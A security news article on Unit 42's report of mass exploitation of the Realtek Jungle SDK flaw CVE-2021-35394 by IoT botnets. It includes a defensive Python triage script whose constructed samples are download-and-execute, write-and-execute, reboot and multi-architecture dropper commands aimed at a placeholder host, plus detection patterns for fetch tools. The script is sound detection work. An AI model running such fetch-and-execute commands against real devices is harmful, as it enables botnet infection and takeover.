Researchers are warning about a spike in exploitation attempts weaponizing a critical remote code execution flaw in Realtek Jungle SDK since the start of August 2022.

According to Palo Alto Networks Unit 42, the ongoing campaign is said to have recorded 134 million exploit attempts as of December 2022, with 97% of the attacks occurring in the past four months.

Close to 50% of the attacks originated from the U.S. (48.3%), followed by Vietnam (17.8%), Russia (14.6%), the Netherlands (7.4%), France (6.4%), Germany (2.3%), and Luxembourg (1.6%). What's more, 95% of the attacks leveraging the security shortcoming that emanated from Russia singled out organizations in Australia.

"Many of the attacks we observed tried to deliver malware to infect vulnerable IoT devices," Unit 42 researchers said in a report, adding "threat groups are using this vulnerability to carry out large-scale attacks on smart devices around the world."

The vulnerability in question is CVE-2021-35394 (CVSS score: 9.8), a set of buffer overflows and an arbitrary command injection bug that could be weaponized to execute arbitrary code with the highest level of privilege and take over affected appliances. The issues were disclosed by ONEKEY (previously IoT Inspector) in August 2021.

The vulnerability impacts a wide range of devices from D-Link, LG, Belkin, ASUS, and NETGEAR.
Unit 42 said it discovered three different kinds of payloads distributed as a result of in-the-wild exploitation of the flaw:

- A script that executes a shell command on the targeted server to download additional malware
- An injected command that writes a binary payload to a file and executes it, and
- An injected command that directly reboots the targeted server to cause a denial-of-service (DoS) condition
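The three payload classes above map cleanly onto a triage heuristic for command strings recovered from a honeypot or from a device's request logs. The following is an added example, not code from Unit 42 or from the article: it classifies captured injected commands into the report's three categories, and separately flags dropper scripts that fetch binaries for several CPU architectures, the pattern the article later attributes to RedGoBot. All sample payloads are constructed for this example (hosts use a TEST-NET address), and the regular expressions are the author's own heuristics, not signatures published by Unit 42.

```python
"""Triage heuristic for command-injection payloads of the kinds Unit 42
describes for CVE-2021-35394 exploitation.  Everything here is an added
illustration: the patterns are assumptions, not published signatures, and
the samples are constructed, not real captures."""
import re

# Fetch tools commonly seen in "download additional malware" payloads.
DOWNLOADERS = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
# Ways a fetched or written file ends up executed: piped to sh, run via
# "sh file", made executable with chmod, or invoked by path after a separator.
EXECUTORS = re.compile(
    r"(\|\s*sh\b|\bsh\s+\S+|\bchmod\b|\./\S+|(?:&&|;|\|\|)\s*/\S+)"
)
# Writing a binary payload straight to a file with echo/printf redirection.
WRITE_TO_FILE = re.compile(r"\b(?:echo|printf)\b.*>{1,2}\s*\S+")
# Commands that only take the device down (the DoS payload class).
REBOOT = re.compile(r"\b(reboot|shutdown\s+-r|init\s+6)\b")
# CPU architecture tokens typical of multi-architecture IoT droppers
# (longest alternatives first so e.g. "mipsel" is not cut to "mips").
ARCH_TOKENS = re.compile(
    r"\b(x86_64|aarch64|mipsel|mips|armv[4-7]l?|arm[4-7]?|i[3-6]86|x86|"
    r"powerpc|ppc|sh4|m68k|sparc)\b",
    re.I,
)

# Constructed sample payloads (not real captures); 198.51.100.0/24 is TEST-NET-2.
SAMPLES = [
    "cd /tmp; wget http://198.51.100.7/x.sh; chmod +x x.sh; sh x.sh",
    r"echo -ne '\x7fELF' > /tmp/.a; chmod 777 /tmp/.a; /tmp/.a",
    "reboot",
    "curl -s http://198.51.100.7/a -o /tmp/a && /tmp/a",
    "ls",
]

# Constructed multi-architecture dropper fragment (fetch lines only).
DROPPER_SCRIPT = """#!/bin/sh
wget http://198.51.100.7/bot.mips -O /tmp/bot.mips
wget http://198.51.100.7/bot.mipsel -O /tmp/bot.mipsel
wget http://198.51.100.7/bot.arm7 -O /tmp/bot.arm7
wget http://198.51.100.7/bot.x86 -O /tmp/bot.x86
wget http://198.51.100.7/bot.aarch64 -O /tmp/bot.aarch64
"""


def classify(cmd: str) -> set:
    """Return the set of payload classes a single injected command matches."""
    labels = set()
    if DOWNLOADERS.search(cmd) and EXECUTORS.search(cmd):
        labels.add("download_and_execute")
    if WRITE_TO_FILE.search(cmd) and EXECUTORS.search(cmd):
        labels.add("write_and_execute")
    if REBOOT.search(cmd):
        labels.add("reboot_dos")
    return labels


def arch_count(script: str) -> int:
    """Number of distinct CPU architecture tokens referenced by a script."""
    return len({m.group(1).lower() for m in ARCH_TOKENS.finditer(script)})


def is_multi_arch_dropper(script: str, threshold: int = 3) -> bool:
    """Flag scripts that fetch binaries for at least `threshold` architectures."""
    return arch_count(script) >= threshold


def summarize(samples) -> dict:
    """Count how many samples fall into each class; unmatched ones are 'unclassified'."""
    counts = {}
    for cmd in samples:
        labels = classify(cmd) or {"unclassified"}
        for label in labels:
            counts[label] = counts.get(label, 0) + 1
    return counts


if __name__ == "__main__":
    for cmd in SAMPLES:
        print(f"{cmd!r:70} -> {sorted(classify(cmd))}")
    print("summary:", summarize(SAMPLES))
    print("dropper architectures:", arch_count(DROPPER_SCRIPT),
          "multi-arch:", is_multi_arch_dropper(DROPPER_SCRIPT))
```

The heuristics deliberately key on the shape of the payload (fetch plus execute, write plus execute, or reboot) rather than on any particular host or filename, because the campaign infrastructure changes far faster than the three behaviours do; anything that lands in `unclassified` is worth a manual look rather than being discarded.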
Also delivered through the abuse of CVE-2021-35394 are known botnets like Mirai, Gafgyt, and Mozi, as well as a new Golang-based distributed denial-of-service (DDoS) botnet dubbed RedGoBot.

First observed in September 2022, the RedGoBot campaign involves dropping a shell script that's designed to download a number of botnet clients tailored to different CPU architectures. The malware, once launched, is equipped to run operating system commands and mount DDoS attacks.

The findings once again underscore the importance of updating software in a timely fashion to avoid exposure to potential threats.

"The surge of attacks leveraging CVE-2021-35394 shows that threat actors are very interested in supply chain vulnerabilities, which can be difficult for the average user to identify and remediate," the researchers concluded. "These issues can make it difficult for the affected user to identify the specific downstream products that are being exploited."